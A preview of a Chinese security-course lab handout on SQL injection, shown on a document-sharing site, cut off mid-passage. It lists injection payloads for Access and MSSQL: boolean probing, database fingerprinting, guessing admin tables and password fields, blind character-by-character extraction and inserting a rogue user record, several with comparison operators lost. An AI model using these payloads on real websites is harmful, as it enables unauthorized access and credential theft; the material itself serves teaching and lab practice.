- 1、本文档共21页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
课程编写类别内容实验课题名称HTTP攻击与防范-SQL注入攻击-03明小子工具实例实验目的与要求1、了解常用web 脚本2、了解常用web 脚本漏洞的利用点实验环境VPC1(虚拟PC)操作系统类型:windows,网络接口:本地连接VPC1 连接要求PC 网络接口,本地连接与实验网络直连软件描述1、学生机要求安装java环境2、vpc安装windows 2003实验环境描述1、学生机与实验室网络直连;2、VPC1与实验室网络直连;3、学生机与VPC1物理链路连通;预备知识1、类型:数字型:and 1=1 and 1=2 判断是否存在注入字符型: and 1=1 and 1=2有哪些信誉好的足球投注网站型: 关键字% and 1=1 and %=% 关键字% and 1=2 and %=%2、IIS报错情况下使用:and user0 (判断是ACCESS还是MSSQL)不报错则使用各自数据库特性来判断and (select count(*) from msysobjects)0 (返回权限不足access数据库)and (select count(*) from sysobjects)0 (返回正常则为MSSQL数据库)and db_name()0 (返回数据库名)and 0(select @@version)-- (判断版本信息)and db_name()0 (返回数据库名)************注意:猜解之前先要找到后台地址,不然白忙了**********3、ACCESS注入:猜解表名(正常则存在admin,不正常则不存在)and exists (select * from [admin])and (Select Count(*) from Admin)0猜解字段:(字段username存在则正常,不正常则不存在)and (Select username from Admin)0and exists (select username from [admin])猜解用户名和密码长度and (select top 1 len(username) from Admin)0and (select top 1 len(password) from Admin)04、原理:如果top 1的username长度大于0,则条件成立;接着就是1、2、3这样测试下去,一直到条件不成立为止,比如4成立,5不成立,就是len(username)=5,即用户名长度为5.得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码.猜解用户and (select top 1 asc(mid(username,1,1)) from Admin)0,1,2…,当输入到109时,显示错误,而108之前显示正确,说明第一个字符的ASCII码为109,得到第一个字符是m。同理and (select top 1 asc(mid(username,2,1) from Admin)0,1,2…到114的时候不成立,说明第二个字符的ASCII码值为114,字符为r。注意的是英文和数字的ASCII码在1-128之间...MSSQL注入:having 1=1-- 【爆出一个表名及字段,如:列 users.ID 在选择列表中无效】group by users.ID having 1=1--group by users.ID, users.username, users.password, users.privs having 1=1--; insert into users values( 666, attacker, foobar, 0xffff )-- 【插入新记录】猜解表名:SQL SERVER的每一个数据库都会有用户表和系统表,在系统表sysobjects中, 数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在sysobjects表中占一行,那么也就是说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个,name (数据表的名字),xtype( 数据表的类型 u为用户表),id( 数据表的对象标志)。and (select top 1 name from sysobjects where xtype=u)0 (得到第一个表名:比如user)and (select top 1 name from sysobjects where xtype=u and name not in (user))0 得到第二个表名,后面的以此类推。。猜解列名:用到系统自带的2个函数col_name()和object_id(),col_name()的格式是“COL_NAME( table_id , colu
您可能关注的文档
- K48+035上承式拱桥施工方案.doc
- K9+572拱桥施工方案.doc
- Joimax椎间孔镜手术护理配合.ppt
- kbzg 67气、血、津液.ppt
- Kerberos情景分析.ppt
- kindle操作手册.docx
- key, spline and pin joints.ppt
- Kartagener综合征护理查房.ppt
- jsp6s0学会拒绝.ppt
- JX600说明书131224.doc
- 五位一体教案教学教案设计.docx
- 思修与法基-教学教案分享.pptx
- 大学军事之《中国国防》题库分享.docx
- 2023版毛泽东思想和中国特色社会主义理论体系概论第五章-中国特色社会主义理论体系的形成发展.pdf
- 思修与法基 教学全案分享.docx
- 大学军事之《军事思想》题库分享.docx
- 《经济思想史》全套课件-国家级精品课程教案课件讲义分享.pdf
- 厦门大学国际金融全套资料(国家级精品课程)--全套课件.pdf
- 2023版毛泽东思想和中国特色社会主义理论体系概论第五章-中国特色社会主义理论体系的形成发展.docx
- 2023版毛泽东思想和中国特色社会主义理论体系概论第五章中国特色社会主义理论体系的形成发展分享.pdf
文档评论(0)